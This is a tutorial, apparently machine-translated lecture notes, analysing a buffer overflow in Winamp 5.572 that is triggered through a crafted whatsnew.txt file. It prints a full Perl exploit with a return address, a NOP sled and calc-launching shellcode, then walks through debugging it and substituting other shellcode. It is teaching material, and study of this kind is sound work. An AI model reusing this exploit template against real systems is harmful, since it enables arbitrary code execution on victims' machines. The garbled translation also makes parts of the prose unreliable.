Buffer Overflow Analysis Lesson 10th: Winamp Buffer Overflow study

buffer Overflow Analysis is a collection of lecture notes for the video course of the same name that I recorded for "I Spring" (www.ichunqiu.com). Every time I finish writing my course documents, I will explain the course according to the contents of the document. And the content of this series is from scratch, to give you a more easy-to-digest buffer Overflow vulnerability explanation. The whole course is a combination of theory and practice, each after the completion of a few basic theories, will be coupled with the actual software in the analysis of loopholes to help you better understand the principle of the loophole. Interested friends can combine this article with the supporting video to learn.
Preface

Winamp is a very classic music playback software, which came out in the late 90. And now music broadcast software industry, the situation is different, at that time can say Winamp is the only choice to listen to music, I believe that the era of computer players are deep experience. And today, there are still a group of loyal Winamp fans still hold the position, this also shows that this player is still a strong vitality.

However, the vulnerability of this software is also very many, a variety of, covering a lot of aspects. And what we're talking about this time is the buffer overflow vulnerability of this software in reading Whatsnew.txt, which is updating the history file.

Vulnerability Replay

The normal Whatsnew.txt file is located in the Winamp folder and is the update history information for the software. In order to reproduce the vulnerability, we need to overwrite the original TXT file with the specially constructed whatsnew.txt. Then open Winamp and select "About Winamp" in the Help section of the menu bar:

Figure 1

in the dialog box that pops up, select "Version history":

Figure 2

the vulnerability is then triggered. But according to the instructions, the use of this whatsnew.txt file found on the Internet can open the Calculator program, but I in the actual test, sometimes can open, sometimes not. In fact, this is very normal, the internet found a lot of loopholes in the use of the file itself is often a variety of problems, so we need to do this here in person to debug, to find out how this TXT file exploits the principle.

Exploit Code AnalysisNow that we have triggered the vulnerability, we can further analyze the cause of the vulnerability. Take a look at its POC code, which is written in the Perl language:

My $version = "Winamp 5.572";  My $junk = "\x41" x 540; My $eip = "\xad\x86\x0e\x07";  # overwrite EIP-070E86AD FFD4 call ESP nde.dll my $nop = "\x90" x 100;  My $shellcode = # windows/exec Cmd=calc.exe "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".  "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".  "\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".  "\X41\X41\X30\X41\X41\X58\X50\X38\X42\X42\X75\X78\X69\X6B\X4C\X6A".  "\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".  "\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".  "\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".  "\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".  "\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".  "\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".  "\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44". "\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35 ".  "\X4C\X4E\X6B\X34\X41\X6A\X4B\X6C\X49\X33\X6C\X35\X74\X64\X44\X4A".  "\X63\X34\X71\X4B\X70\X63\X54\X6E\X6B\X71\X50\X76\X50\X4F\X75\X4B".  "\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".  "\X6C\X6C\X6D\X6E\X6B\X75\X38\X54\X48\X58\X6B\X73\X39\X6E\X6B\X4B".  "\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".  "\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".  "\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".  "\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".  "\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".  "\x30\x47";  Open (myfile, ' >> whatsnew.txt ');  Print MyFile $version. $junk. $eip. $nop. $shellcode;  print "[+] whatsnew.txt written.\n";  Print "[] now copy it to your Winamp folder...\n"; Print "[] Run Winamp and hits [about Winamp]->[version history]\n";

First look at the bottom fourth statement, which is actually the format of the exploit code, is a total of five pieces of content, namely Version+junk+eip+nop+shellcode. Where version is the current software edition, Here is version 5.572, junk is a fill code, here is 540 0x41, that is, capital A, padding is for the next return address of the overwrite; EIP is the return address we will overwrite, here is the 0X070E86AD;NOP position is 100 0x90; and finally Shellco. De code out.

Debugging the vulnerability

In order to debug this vulnerability, we can combine the constructed whatsnew.txt. First, locate the location where the vulnerability occurs, and then analyze the breakpoint at the appropriate location. Our previous practice was to break up and down breakpoints in a function similar to strcpy, then parse on a breakpoint, or up and down a function like fopen. Of course, the method is a variety of, regardless of which method, basically can achieve the purpose. So the needle for this program, since we already know that the program will open whatsnew.txt this file, then you might want to find the program in the string, and then analysis.

first use OD to load the Winamp.exe program, right-click in the Disassembly code area and select "All reference text strings" in "Find":

Figure 3

Then select the topmost entry to indicate a search from the beginning. Right-click, select Find text, enter the string name we want to find "Whatsnew.txt", and then click OK:

Figure 4

In fact, there are a total of two results can be searched, then we can look at these two statements separately. Perhaps these two statements themselves are not fopen function argument statement, but there is no relationship, I believe the distance fopen is not too far. First, double-click the first result to the location of its disassembly code, and then look up and down in that position to find the location of the suspect file Open statement:

Figure 5

You can start the next breakpoint at the 0x004015ee, and then press F9 to let the program run, according to the previous steps to trigger the vulnerability, so the program stopped in the 0x004015ee position. The first is to use the malloc statement to request the size of 0x20000 memory space, the return value is the address of the allocated space, I here is 0x0286c008. Then call Wfopen to open the Whatsnew.txt file. Call the Fread function again:

Figure 6

By analyzing the parameters of this function, you know that the Fread function reads the contents of the file into the space just allocated. Then use the STRNCMP function to do the comparison:

Figure 7

Visible, here is the first 9 characters of the read Whatsnew.txt file are verified as "Winamp 5." Verify that the next action is possible. This also explains why you need to add "version" information in the exploit code. Then came the most important position of the string copy function:

Figure 8

Here is a copy of the content read from the Whatsnew.txt file to the location of the address 0x00bdebac. We can follow the F8 step over this function to see:

Figure 9

It is visible that the contents of the Whatsnew.txt file we have written are already written in the current stack space, while the 0X00BDEDD4 is the location of the original return address. Then proceed directly to the location of the return address to see:

Figure 10

You can see that the program is using the call ESP method, at this time the ESP save address is 0x00bdede8, just fall in the 0x90 that is the NOP section, behind these 0x90, is shellcode.

Our goal here is not to figure out why the original shellcode can sometimes be executed, and if you are interested in doing it yourself, we may as well use the shellcode implant we have been using before to see if we can achieve the desired results. Whatsnew.txt can be edited using the hex editing tool:

Figure 11

Then try to trigger the vulnerability again:

Figure 12

It can be seen that our use is successful.

SummaryThis time we are talking about vulnerability analysis based on the Shellcode code of others. It can be seen that even the code of senior man, not necessarily very useful. Therefore, it is necessary for us to continue to try and study, to learn from the minds of others in order to continue to improve.

Buffer Overflow Analysis lesson 10th: Winamp Buffer Overflow study